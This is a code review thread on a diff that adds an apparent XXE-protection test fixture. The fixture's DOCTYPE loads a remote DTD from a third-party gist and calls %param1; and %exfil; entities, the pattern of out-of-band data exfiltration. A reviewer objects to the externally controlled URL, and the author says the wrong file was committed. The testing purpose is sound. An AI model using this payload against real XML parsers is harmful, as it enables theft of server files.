src/test/resources/security/xxe-protection.xml

```diff
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE bom [<!ENTITY % sp SYSTEM "https://gist.githubusercontent.com/agustin-mrtz/593ab443b77890d052e55899b16b61a8/raw/3cdd376bba0007145fa2bbacb9abe36cbd5a43ce/file.dtd"> %sp; %param1; %exfil;]>
```

Comment:
Is it possible to change this to some URL or local file path that is *not* controlled by a 3rd party?

Reply:
> Is it possible to change this to some URL or local file path that is _not_ controlled by a 3rd party?

Updated it, committed the wrong file while testing